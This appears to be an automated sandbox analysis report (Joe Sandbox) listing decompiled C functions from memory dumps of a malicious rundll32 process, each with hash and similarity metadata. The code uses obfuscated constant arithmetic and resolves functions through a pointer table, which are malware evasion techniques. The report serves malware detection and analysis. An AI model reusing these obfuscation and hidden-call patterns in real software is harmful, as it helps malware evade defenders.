                                                                                                                                                            				_v48 = 0xad4f7a;
                                                                                                                                                            				_v16 = 0xf18dbd;
                                                                                                                                                            				_v16 = _v16 + 0xffff4795;
                                                                                                                                                            				_v16 = _v16 << 0xe;
                                                                                                                                                            				_v16 = _v16 >> 6;
                                                                                                                                                            				_v16 = _v16 ^ 0x00dff17e;
                                                                                                                                                            				_v12 = 0xaf5949;
                                                                                                                                                            				_v12 = _v12 | 0xe2d389df;
                                                                                                                                                            				_v12 = _v12 + 0x286;
                                                                                                                                                            				_t112 = 3;
                                                                                                                                                            				_v12 = _v12 / _t112;
                                                                                                                                                            				_v12 = _v12 ^ 0x4ba32b72;
                                                                                                                                                            				_v24 = 0x2aefd1;
                                                                                                                                                            				_t113 = 0x7d;
                                                                                                                                                            				_t128 = _a4;
                                                                                                                                                            				_v24 = _v24 * 0x59;
                                                                                                                                                            				_v24 = _v24 << 2;
                                                                                                                                                            				_v24 = _v24 ^ 0x3bb9ca43;
                                                                                                                                                            				_v8 = 0x985427;
                                                                                                                                                            				_v8 = _v8 << 2;
                                                                                                                                                            				_v8 = _v8 ^ 0x713a2c3c;
                                                                                                                                                            				_v8 = _v8 | 0x45eb1ca3;
                                                                                                                                                            				_v8 = _v8 ^ 0x77f5f6d4;
                                                                                                                                                            				_v28 = 0xa7f2b4;
                                                                                                                                                            				_v28 = _v28 >> 0xc;
                                                                                                                                                            				_v28 = _v28 + 0x7e4a;
                                                                                                                                                            				_v28 = _v28 ^ 0x000cc7a8;
                                                                                                                                                            				_v40 = 0x7087c6;
                                                                                                                                                            				_t114 = 0x69;
                                                                                                                                                            				_v40 = _v40 / _t113;
                                                                                                                                                            				_v40 = _v40 ^ 0x00014835;
                                                                                                                                                            				_v20 = 0xcde00b;
                                                                                                                                                            				_v20 = _v20 + 0xffffcf30;
                                                                                                                                                            				_v20 = _v20 | 0xcdf6f1c4;
                                                                                                                                                            				_v20 = _v20 + 0xfc2b;
                                                                                                                                                            				_v20 = _v20 ^ 0xce0272c5;
                                                                                                                                                            				_v36 = 0x30875a;
                                                                                                                                                            				_v36 = _v36 * 0x47;
                                                                                                                                                            				_v36 = _v36 / _t114;
                                                                                                                                                            				_v36 = _v36 ^ 0x0028facf;
                                                                                                                                                            				_v32 = 0x6c449b;
                                                                                                                                                            				_v32 = _v32 >> 0xf;
                                                                                                                                                            				_v32 = _v32 + 0xffff12fc;
                                                                                                                                                            				_v32 = _v32 ^ 0xfff19483;
                                                                                                                                                            				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
                                                                                                                                                            				_t134 = _t106;
                                                                                                                                                            				if(_t106 != 0) {
                                                                                                                                                            					_push(_v8);
                                                                                                                                                            					_push(_v24);
                                                                                                                                                            					_push(_v12);
                                                                                                                                                            					_t108 = E00388606(_v16, 0x371378, _t134);
                                                                                                                                                            					_push(_v20);
                                                                                                                                                            					_t130 = _t108;
                                                                                                                                                            					_push(_t108);
                                                                                                                                                            					_push(_v40);
                                                                                                                                                            					_t109 = E0037CBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
                                                                                                                                                            					if(_t109 != 0) {
                                                                                                                                                            						 *_t109();
                                                                                                                                                            					}
                                                                                                                                                            					E0037A8B0(_v36, _t130, _v32);
                                                                                                                                                            				}
                                                                                                                                                            				return 0;
                                                                                                                                                            			}






















Strings
Memory Dump Source
• Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
Yara matches
Similarity
• API ID:
• String ID: <,:q$J~
• API String ID: 0-951887683
• Opcode ID: e796d55db6a29258f60e2c3a0b3bafce15da679fb3cc2482a878e09c53b2e5d3
• Instruction ID: a8845589b393cabcfce1230d869c4b30856098d1f38a72969cbe3e560a6dea72
• Opcode Fuzzy Hash: e796d55db6a29258f60e2c3a0b3bafce15da679fb3cc2482a878e09c53b2e5d3
• Instruction Fuzzy Hash: CD411F71D01309ABDF19CFA1C94A9EEBBB1FB54314F208199D410BA2A0D7B91B55CFA4
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0037EE81(void* __eflags) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				char _v44;
                                                                                                                                                            				short _v48;
                                                                                                                                                            				short _v52;
                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                            				char _v576;
                                                                                                                                                            				intOrPtr* _t95;
                                                                                                                                                            				signed int _t99;
                                                                                                                                                            				signed int _t100;
                                                                                                                                                            
                                                                                                                                                            				_v56 = 0x3b8b1c;
                                                                                                                                                            				_v44 = 0;
                                                                                                                                                            				_v52 = 0;
                                                                                                                                                            				_v48 = 0;
                                                                                                                                                            				_v8 = 0xf9e323;
                                                                                                                                                            				_v8 = _v8 ^ 0x73816ffa;
                                                                                                                                                            				_v8 = _v8 + 0x5b26;
                                                                                                                                                            				_v8 = _v8 ^ 0x387262e7;
                                                                                                                                                            				_v8 = _v8 ^ 0x4b076809;
                                                                                                                                                            				_v20 = 0x75aab0;
                                                                                                                                                            				_v20 = _v20 ^ 0xc40c30fa;
                                                                                                                                                            				_v20 = _v20 + 0x78e9;
                                                                                                                                                            				_v20 = _v20 ^ 0xc4737271;
                                                                                                                                                            				_v16 = 0xa8e87a;
                                                                                                                                                            				_v16 = _v16 + 0xffff799a;
                                                                                                                                                            				_t99 = 0x33;
                                                                                                                                                            				_v16 = _v16 / _t99;
                                                                                                                                                            				_v16 = _v16 ^ 0x000fed3f;
                                                                                                                                                            				_v28 = 0x7feeb5;
                                                                                                                                                            				_v28 = _v28 + 0xffffe4f6;
                                                                                                                                                            				_v28 = _v28 ^ 0x007d0c9c;
                                                                                                                                                            				_v32 = 0x59c916;
                                                                                                                                                            				_t100 = 0x5d;
                                                                                                                                                            				_v32 = _v32 / _t100;
                                                                                                                                                            				_v32 = _v32 ^ 0x000d1fec;
                                                                                                                                                            				_v12 = 0x866588;
                                                                                                                                                            				_v12 = _v12 ^ 0x68ade4cb;
                                                                                                                                                            				_v12 = _v12 + 0xffffbaa5;
                                                                                                                                                            				_v12 = _v12 ^ 0x68223e43;
                                                                                                                                                            				_v36 = 0xbafac2;
                                                                                                                                                            				_v36 = _v36 ^ 0x5e34b155;
                                                                                                                                                            				_v36 = _v36 ^ 0x5e8c811c;
                                                                                                                                                            				_v24 = 0xc770cb;
                                                                                                                                                            				_v24 = _v24 >> 0xf;
                                                                                                                                                            				_v24 = _v24 ^ 0x95635bf4;
                                                                                                                                                            				_v24 = _v24 ^ 0x956359d7;
                                                                                                                                                            				_v40 = 0xbd0b83;
                                                                                                                                                            				_v40 = _v40 >> 3;
                                                                                                                                                            				_v40 = _v40 ^ 0x001e2563;
                                                                                                                                                            				_t101 = _v8;
                                                                                                                                                            				if(E00388F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
                                                                                                                                                            					_t95 =  &_v576;
                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                            						while( *_t95 != 0x5c) {
                                                                                                                                                            							_t95 = _t95 + 2;
                                                                                                                                                            							if( *_t95 != 0) {
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            							}
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						_t101 = 0;
                                                                                                                                                            						 *((short*)(_t95 + 2)) = 0;
                                                                                                                                                            					}
                                                                                                                                                            					L6:
                                                                                                                                                            					E0038DB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
                                                                                                                                                            				}
                                                                                                                                                            				return _v44;
                                                                                                                                                            			}





















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: C>"h$br8
                                                                                                                                                            • API String ID: 0-573140060
                                                                                                                                                            • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                                            • Instruction ID: e2fea2f67797946004dc1d9a5d5a697f271f4a9b284c746d0ef63b0a30c3a432
                                                                                                                                                            • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                                            • Instruction Fuzzy Hash: 8241F072C01219EBCF19DFE4C94A9EEBBB5FB08304F20819AE515B6260E3B45A55CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E0038AA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				unsigned int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                            				void* _t83;
                                                                                                                                                            				signed int _t85;
                                                                                                                                                            				signed int _t91;
                                                                                                                                                            
                                                                                                                                                            				_v40 = _v40 & 0x00000000;
                                                                                                                                                            				_v48 = 0xea50c7;
                                                                                                                                                            				_v44 = 0x183406;
                                                                                                                                                            				_v8 = 0x4cb37c;
                                                                                                                                                            				_v8 = _v8 + 0xc736;
                                                                                                                                                            				_v8 = _v8 + 0xd4a7;
                                                                                                                                                            				_t91 = __edx;
                                                                                                                                                            				_t85 = 0x64;
                                                                                                                                                            				_v8 = _v8 * 0x2d;
                                                                                                                                                            				_v8 = _v8 ^ 0x0dcd94f9;
                                                                                                                                                            				_v24 = 0x238f3e;
                                                                                                                                                            				_v24 = _v24 << 3;
                                                                                                                                                            				_v24 = _v24 ^ 0x011b8be3;
                                                                                                                                                            				_v20 = 0x73abc8;
                                                                                                                                                            				_v20 = _v20 >> 3;
                                                                                                                                                            				_v20 = _v20 ^ 0x00035013;
                                                                                                                                                            				_v16 = 0x5012b6;
                                                                                                                                                            				_v16 = _v16 >> 0x10;
                                                                                                                                                            				_v16 = _v16 / _t85;
                                                                                                                                                            				_v16 = _v16 ^ 0x000aff4c;
                                                                                                                                                            				_v12 = 0x8c34bb;
                                                                                                                                                            				_v12 = _v12 | 0x8c5a3f77;
                                                                                                                                                            				_v12 = _v12 + 0xffff11fb;
                                                                                                                                                            				_v12 = _v12 ^ 0x2d4fbea1;
                                                                                                                                                            				_v12 = _v12 ^ 0xa19c1e56;
                                                                                                                                                            				_v36 = 0xff820a;
                                                                                                                                                            				_v36 = _v36 | 0x4fe4a4bc;
                                                                                                                                                            				_v36 = _v36 ^ 0x4ffdd4f4;
                                                                                                                                                            				_v32 = 0x36506a;
                                                                                                                                                            				_v32 = _v32 + 0x4de;
                                                                                                                                                            				_v32 = _v32 ^ 0x003709b9;
                                                                                                                                                            				_v28 = 0x64fd3b;
                                                                                                                                                            				_v28 = _v28 + 0xffff3e7a;
                                                                                                                                                            				_v28 = _v28 ^ 0x00656766;
                                                                                                                                                            				if( *((intOrPtr*)(0x393210 + __edx * 4)) == 0) {
                                                                                                                                                            					_t83 = E00380A0E(_t85, _t85, _a4);
                                                                                                                                                            					_push(_v28);
                                                                                                                                                            					_push(_a12);
                                                                                                                                                            					_push(_v32);
                                                                                                                                                            					_push(_t83);
                                                                                                                                                            					 *((intOrPtr*)(0x393210 + _t91 * 4)) = E0037CDCD(_v12, _v36);
                                                                                                                                                            				}
                                                                                                                                                            				return  *((intOrPtr*)(0x393210 + _t91 * 4));
                                                                                                                                                            			}


















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: fge$jP6
                                                                                                                                                            • API String ID: 0-775479084
                                                                                                                                                            • Opcode ID: 9cd61206a127deec502cb2c27551f212f8ce1c2a9a9fa5334a06f70944dd0361
                                                                                                                                                            • Instruction ID: 1e112454f138fea1dc41a9d289ef6114cccae4e5e71c5a706f482e8af9c12951
                                                                                                                                                            • Opcode Fuzzy Hash: 9cd61206a127deec502cb2c27551f212f8ce1c2a9a9fa5334a06f70944dd0361
                                                                                                                                                            • Instruction Fuzzy Hash: 7C31EEB1C00209EBCB49CFE4CA4A9AEBBB5FB09308F108589D551B6220C3B95A49CF95
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E00390E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				void* _t61;
                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                            				void* _t73;
                                                                                                                                                            				intOrPtr* _t74;
                                                                                                                                                            
                                                                                                                                                            				_t74 = _a16;
                                                                                                                                                            				_push(_t74);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_t73 = __ecx;
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t61);
                                                                                                                                                            				_v16 = 0x2b4f5d;
                                                                                                                                                            				_v16 = _v16 * 0x1c;
                                                                                                                                                            				_v16 = _v16 >> 8;
                                                                                                                                                            				_v16 = _v16 ^ 0x000abada;
                                                                                                                                                            				_v24 = 0x6f176d;
                                                                                                                                                            				_v24 = _v24 | 0x8892b5fd;
                                                                                                                                                            				_v24 = _v24 ^ 0x88fd6dba;
                                                                                                                                                            				_v12 = 0x9049ef;
                                                                                                                                                            				_v12 = _v12 >> 4;
                                                                                                                                                            				_v12 = _v12 ^ 0x7aa47b64;
                                                                                                                                                            				_v12 = _v12 ^ 0x7aa68413;
                                                                                                                                                            				_a16 = 0x9c064;
                                                                                                                                                            				_a16 = _a16 + 0x4e6a;
                                                                                                                                                            				_a16 = _a16 + 0xffffd44e;
                                                                                                                                                            				_a16 = _a16 | 0x475ceb65;
                                                                                                                                                            				_a16 = _a16 ^ 0x47532e3d;
                                                                                                                                                            				_v8 = 0xaf6c6f;
                                                                                                                                                            				_v8 = _v8 >> 6;
                                                                                                                                                            				_v8 = _v8 + 0xad29;
                                                                                                                                                            				_v8 = _v8 + 0xd52;
                                                                                                                                                            				_v8 = _v8 ^ 0x000b7d9e;
                                                                                                                                                            				_v20 = 0xd79f7b;
                                                                                                                                                            				_v20 = _v20 ^ 0x214a9efd;
                                                                                                                                                            				_v20 = _v20 >> 5;
                                                                                                                                                            				_v20 = _v20 ^ 0x010f9d8f;
                                                                                                                                                            				E00380DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
                                                                                                                                                            				E0037ED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
                                                                                                                                                            				_t66 =  *((intOrPtr*)(_t74 + 4));
                                                                                                                                                            				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
                                                                                                                                                            				return _t66;
                                                                                                                                                            			}













                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: =.SG$]O+
                                                                                                                                                            • API String ID: 0-348654084
                                                                                                                                                            • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                                            • Instruction ID: 1f664638101866ee1040d3696b672069fb45c7589e6e155cb63775c744e82eb0
                                                                                                                                                            • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                                            • Instruction Fuzzy Hash: 6221257180120DEFCF45DFA4DA064AEBBB1FF45304F208598E91566224C3719B24DFA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                                            • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                                            • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                                                            • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                                            • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                            			E0038044F() {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				void* _t309;
                                                                                                                                                            				intOrPtr _t310;
                                                                                                                                                            				void* _t311;
                                                                                                                                                            				intOrPtr _t321;
                                                                                                                                                            				intOrPtr _t325;
                                                                                                                                                            				void* _t329;
                                                                                                                                                            				signed int _t331;
                                                                                                                                                            				signed int _t332;
                                                                                                                                                            				signed int _t333;
                                                                                                                                                            				signed int _t334;
                                                                                                                                                            				signed int _t335;
                                                                                                                                                            				signed int _t336;
                                                                                                                                                            				signed int _t337;
                                                                                                                                                            				signed int _t338;
                                                                                                                                                            				signed int _t339;
                                                                                                                                                            				intOrPtr _t369;
                                                                                                                                                            				void* _t373;
                                                                                                                                                            				intOrPtr _t374;
                                                                                                                                                            				void* _t379;
                                                                                                                                                            				signed int* _t383;
                                                                                                                                                            
                                                                                                                                                            				_t383 =  &_v140;
                                                                                                                                                            				_v16 = 0x8f0e94;
                                                                                                                                                            				_v12 = 0x9bdfd3;
                                                                                                                                                            				_t329 = 0;
                                                                                                                                                            				_v8 = _v8 & 0;
                                                                                                                                                            				_v4 = _v4 & 0;
                                                                                                                                                            				_v68 = 0xf0a33d;
                                                                                                                                                            				_v68 = _v68 ^ 0x64690d06;
                                                                                                                                                            				_v68 = _v68 >> 7;
                                                                                                                                                            				_v68 = _v68 ^ 0x00c9335c;
                                                                                                                                                            				_v96 = 0x45a6c;
                                                                                                                                                            				_v96 = _v96 + 0xffff2947;
                                                                                                                                                            				_v96 = _v96 >> 0x10;
                                                                                                                                                            				_v96 = _v96 ^ 0x00000003;
                                                                                                                                                            				_v56 = 0xab09eb;
                                                                                                                                                            				_v56 = _v56 | 0x7e070137;
                                                                                                                                                            				_v56 = _v56 ^ 0x7eaf09ff;
                                                                                                                                                            				_v80 = 0xa0f766;
                                                                                                                                                            				_v80 = _v80 | 0xafeefcb7;
                                                                                                                                                            				_v80 = _v80 ^ 0xafeefff7;
                                                                                                                                                            				_v48 = 0xf26de0;
                                                                                                                                                            				_v48 = _v48 + 0xffff1ff1;
                                                                                                                                                            				_v48 = _v48 ^ 0x00f18dd1;
                                                                                                                                                            				_v76 = 0x20d89d;
                                                                                                                                                            				_v76 = _v76 + 0xffff51c8;
                                                                                                                                                            				_v76 = _v76 | 0xd50d8457;
                                                                                                                                                            				_v76 = _v76 ^ 0xd52cfd33;
                                                                                                                                                            				_v136 = 0x1fce72;
                                                                                                                                                            				_v136 = _v136 >> 0xe;
                                                                                                                                                            				_v136 = _v136 | 0xd51e44d2;
                                                                                                                                                            				_t331 = 7;
                                                                                                                                                            				_v136 = _v136 / _t331;
                                                                                                                                                            				_v136 = _v136 ^ 0x1e7b1fff;
                                                                                                                                                            				_t379 = 0x1e2498b;
                                                                                                                                                            				_v92 = 0x2fa0bb;
                                                                                                                                                            				_v92 = _v92 >> 7;
                                                                                                                                                            				_v92 = _v92 << 1;
                                                                                                                                                            				_v92 = _v92 ^ 0x0000a534;
                                                                                                                                                            				_v52 = 0x3913b;
                                                                                                                                                            				_t332 = 0x4f;
                                                                                                                                                            				_v52 = _v52 / _t332;
                                                                                                                                                            				_v52 = _v52 ^ 0x00068b65;
                                                                                                                                                            				_v104 = 0xfffd78;
                                                                                                                                                            				_v104 = _v104 | 0x3b05e9e1;
                                                                                                                                                            				_v104 = _v104 + 0x741e;
                                                                                                                                                            				_v104 = _v104 ^ 0x7591a7da;
                                                                                                                                                            				_v104 = _v104 ^ 0x4990882f;
                                                                                                                                                            				_v84 = 0xe3d15a;
                                                                                                                                                            				_v84 = _v84 << 8;
                                                                                                                                                            				_v84 = _v84 ^ 0xbeb387df;
                                                                                                                                                            				_v84 = _v84 ^ 0x5d62ae1e;
                                                                                                                                                            				_v24 = 0xb3d42d;
                                                                                                                                                            				_v24 = _v24 | 0x6ee5a57e;
                                                                                                                                                            				_v24 = _v24 ^ 0x6efe8c67;
                                                                                                                                                            				_v60 = 0x6708ad;
                                                                                                                                                            				_v60 = _v60 + 0xd3fd;
                                                                                                                                                            				_v60 = _v60 ^ 0x0061923e;
                                                                                                                                                            				_v128 = 0x5551d4;
                                                                                                                                                            				_t333 = 0x50;
                                                                                                                                                            				_v128 = _v128 / _t333;
                                                                                                                                                            				_t334 = 0x7a;
                                                                                                                                                            				_v128 = _v128 / _t334;
                                                                                                                                                            				_t335 = 0x7e;
                                                                                                                                                            				_v128 = _v128 * 0x46;
                                                                                                                                                            				_v128 = _v128 ^ 0x000c63e9;
                                                                                                                                                            				_v28 = 0xd668f8;
                                                                                                                                                            				_v28 = _v28 << 0x10;
                                                                                                                                                            				_v28 = _v28 ^ 0x68f34519;
                                                                                                                                                            				_v112 = 0x194a18;
                                                                                                                                                            				_v112 = _v112 / _t335;
                                                                                                                                                            				_v112 = _v112 | 0xa7c33fbe;
                                                                                                                                                            				_t336 = 0x65;
                                                                                                                                                            				_v112 = _v112 / _t336;
                                                                                                                                                            				_v112 = _v112 ^ 0x01a285cf;
                                                                                                                                                            				_v44 = 0xc79794;
                                                                                                                                                            				_v44 = _v44 ^ 0x35aba003;
                                                                                                                                                            				_v44 = _v44 ^ 0x356e5b19;
                                                                                                                                                            				_v140 = 0x380362;
                                                                                                                                                            				_t337 = 0x79;
                                                                                                                                                            				_v140 = _v140 * 5;
                                                                                                                                                            				_v140 = _v140 ^ 0x1d7b2daf;
                                                                                                                                                            				_v140 = _v140 + 0x590f;
                                                                                                                                                            				_v140 = _v140 ^ 0x1c6cd8ab;
                                                                                                                                                            				_v120 = 0x1c8328;
                                                                                                                                                            				_v120 = _v120 / _t337;
                                                                                                                                                            				_t338 = 0xa;
                                                                                                                                                            				_v120 = _v120 / _t338;
                                                                                                                                                            				_v120 = _v120 | 0x9d020d0f;
                                                                                                                                                            				_v120 = _v120 ^ 0x9d02076d;
                                                                                                                                                            				_v124 = 0x55cbd6;
                                                                                                                                                            				_v124 = _v124 >> 9;
                                                                                                                                                            				_v124 = _v124 >> 0xc;
                                                                                                                                                            				_v124 = _v124 >> 6;
                                                                                                                                                            				_v124 = _v124 ^ 0x000fb83a;
                                                                                                                                                            				_v132 = 0xf0ac8c;
                                                                                                                                                            				_v132 = _v132 | 0x3804c269;
                                                                                                                                                            				_v132 = _v132 >> 1;
                                                                                                                                                            				_v132 = _v132 + 0xffff8da8;
                                                                                                                                                            				_v132 = _v132 ^ 0x1c781e64;
                                                                                                                                                            				_v88 = 0x7992e8;
                                                                                                                                                            				_v88 = _v88 | 0xba3027fa;
                                                                                                                                                            				_v88 = _v88 >> 9;
                                                                                                                                                            				_v88 = _v88 ^ 0x0051fda0;
                                                                                                                                                            				_v36 = 0x7aefbd;
                                                                                                                                                            				_v36 = _v36 + 0xfffff4eb;
                                                                                                                                                            				_v36 = _v36 ^ 0x0078a7fc;
                                                                                                                                                            				_v40 = 0xf56b46;
                                                                                                                                                            				_v40 = _v40 + 0xffff9ce0;
                                                                                                                                                            				_v40 = _v40 ^ 0x00fe48d4;
                                                                                                                                                            				_v108 = 0x27569f;
                                                                                                                                                            				_v108 = _v108 + 0x2c0a;
                                                                                                                                                            				_v108 = _v108 ^ 0xb442ac8c;
                                                                                                                                                            				_v108 = _v108 ^ 0xdc856b2a;
                                                                                                                                                            				_v108 = _v108 ^ 0x68e3c0da;
                                                                                                                                                            				_v116 = 0xbcba21;
                                                                                                                                                            				_v116 = _v116 << 0xd;
                                                                                                                                                            				_v116 = _v116 << 8;
                                                                                                                                                            				_v116 = _v116 >> 6;
                                                                                                                                                            				_v116 = _v116 ^ 0x011b605a;
                                                                                                                                                            				_v32 = 0x87c31e;
                                                                                                                                                            				_v32 = _v32 ^ 0x05bc26b1;
                                                                                                                                                            				_v32 = _v32 ^ 0x05363b16;
                                                                                                                                                            				_v100 = 0x4be1cd;
                                                                                                                                                            				_v100 = _v100 + 0xffff13dd;
                                                                                                                                                            				_v100 = _v100 | 0xdbf19b4f;
                                                                                                                                                            				_v100 = _v100 >> 7;
                                                                                                                                                            				_v100 = _v100 ^ 0x01b90151;
                                                                                                                                                            				_v64 = 0xb1223e;
                                                                                                                                                            				_v64 = _v64 | 0xb1fef6fe;
                                                                                                                                                            				_v64 = _v64 ^ 0xb1f65c82;
                                                                                                                                                            				_v72 = 0x9ef2a7;
                                                                                                                                                            				_v72 = _v72 * 0x66;
